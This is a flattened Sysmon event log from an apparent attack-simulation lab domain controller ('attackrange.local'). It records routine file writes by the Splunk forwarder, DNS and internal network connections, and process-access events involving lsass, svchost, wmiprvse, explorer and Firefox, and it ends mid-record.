16:52:27.337{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60124-false10.0.1.12-8000- 23542300x80000000000000002236239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:37.590{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1426281CE53FDC96E80938EB720B9BE,SHA256=E512A0216E1BAA39AC4335EE670762B3E663D1B133179C6F8DF0872C5988EC37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:37.221{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26D07795766E8DD13C7D24D172CEF427,SHA256=147C4DE2D9026FF6560DBDC699C51CDDC8984C6007D7511D78FD3647E57319CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:38.624{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34A6493465ABE048FB9A2F37E7941D6E,SHA256=3EFA6668F57CE0F9237936B37CEF64F728DF9A0223A8657D4A2EEEBCAE475DBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:39.812{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4F3E6511B5CA7F7CA7BE2739C5B6ED20,SHA256=2A91D28D1B2EFF599A464F47FA0A507E4E429F1DEA495C13A5E6A10332DBB955,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:39.653{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9176447F13E683BF9441461634725F65,SHA256=0457CB85D5A19E796147662770FDB3BD2E5A742A22E671776834EC7DBD756645,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:39.497{05ADC7E1-7946-6039-1610-00000000AD01}3144ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\9unhrnfd.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=A91AE1CBDE9310FBFBEB834585C1FFF8,SHA256=323B460C6E57537846EA23C5058FE102BC3489BE5F7FB6A9C34354468F1D6FAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:40.668{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B9A9D101985AD4D01D2F98B404C7D61,SHA256=202E90963EB8A3DDB1EF6A3436A09D17597BF17BE2CCEF953B5000FA6A2825E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:40.559{05ADC7E1-229F-6039-1600-00000000AD01}154012160C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:40.559{05ADC7E1-229F-6039-1600-00000000AD01}154012160C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002236251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:31.869{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local64643- 23542300x80000000000000002236250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:41.747{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70E9A001E9D1664DFACFA226654DC4CC,SHA256=86B26CEC944B9F115D346786463C24655301CE1072BA7ADAE2C1D1C50BADA449,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:41.684{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C1AD536CACC7AF5F25BD777353B1346,SHA256=A33C9E60388C4D14E42351467E82F86F7D7E86A2A6787D707A9B2BB0430B85F0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002236256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:32.899{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local64643- 354300x80000000000000002236255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:32.400{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60126-false10.0.1.12-8000- 354300x80000000000000002236254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:31.872{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-63141-true2001:500:12:0:0:0:0:d0dG.ROOT-SERVERS.NET53domain 23542300x80000000000000002236253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:42.778{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC460DB56264293616BAFB173767F38E,SHA256=67F7FF3B16EE936946D8AF769DC088E1BDB18E41A35302193D3C490B202624FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:42.700{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EEF4F8A6403268B06A3500141EA90A3,SHA256=B94E085383DCF541800FFB4BD791079DB00D2040121D5EE86AA2B2DD45882ADA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:43.720{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A21F8AF1E3827B36E550F3680788B811,SHA256=A5DEF56D1A9991D56D0EE9F934A4C93E3B0521F0DA20C65A80A393A5F00BC95B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:43.684{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-2299-6039-0100-00000000AD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000002236260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:44.747{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6FCF6FF31EB8E68FB21B0F3861E03CF,SHA256=DA9A9E32DE728D31E53FE60E7470BE89AB282A18AC5D29FD3107ABC046C366A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:44.700{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B9A48B5EED9FDA34FB15D6F7B2A038CD,SHA256=A9DB4F54F6506E2F3727D337E8A4764E0640D44F1737CB3A0EA9D4F8BAD639AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:45.814{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1A04CCE72E8E9C6D5F1351D6C6D5F824,SHA256=76EC7D85C2885A598A96B4909899E3261EEC1FAA4E418889DC02276925FF81A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:45.747{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=010F1123072AC107E92A7801FE06BE41,SHA256=030E17DD0C396979D3A7916F5D167E3E61BA87105B24902E7C7AEFCF829974CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002236262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:34.838{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60127-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local445microsoft-ds 354300x80000000000000002236261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:34.838{05ADC7E1-2299-6039-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60127-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local445microsoft-ds 23542300x80000000000000002236265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:46.778{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C8923EA4E73C0375F31A99C32161925,SHA256=25D3B61AFB200841286351C6FA26FB93FA816DA768AA1EB7068B2CA6EF31F7C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:47.793{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21F8829E9E84BABEEC26E9A94B6B0EDB,SHA256=FB5CA5A1E95FF36610CAB1A7E42A1DAAFF1D6DABDD4B39FAA7937D6B35438811,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:47.424{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4D91ED44521D1E384193CB7CBC69C7E,SHA256=CC2D4B334D790B4E7634E1585178EBE5EAB70EC29ADFDF3710268759F042F07B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002236266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:36.493{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local64275- 23542300x80000000000000002236271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:48.814{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B57CA2CF87687963F1BE95E6F3240BC,SHA256=D0F2281B232D08CF52C7BDA26CCBC929BAE15777C08834A17CA6FE83D75ACD5D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002236270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:37.508{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local64275- 23542300x80000000000000002236269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:48.043{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FF364B13EB91121C47FC8051656F7857,SHA256=4B17DDCF5149378A54DDAF2CD019AEEFD0306D2E0D26379DCE52EFA96F27B91D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:49.840{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A07F54F893304EFCB03C561B068F781,SHA256=E451F121B7746E1ED68F71BEB275B82D852EF38F526C1D4D62CABB741D4D0275,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:49.220{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F65DBE831CE050BDA02EF8FFABA7805F,SHA256=27343B54F28899CC59F525A2593402CABB258AFFC5B3DDD3EC9B6B009617CF41,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002236272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:38.165{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60128-false10.0.1.12-8000- 23542300x80000000000000002236276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:50.903{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72B2D9215A8E9C75F1173C1927B08E1E,SHA256=C1FE194FAD667A67678E1A737CE1129DBBF8C77E6107AEC8A4E9DBFA61E76F00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:50.778{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0FF987CBDC10940DA699726D786BC6AB,SHA256=4D07AA1F707F4C19936D3F9E29D522846AF6B6D6FC0D651DEA0BF87991AFB1AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 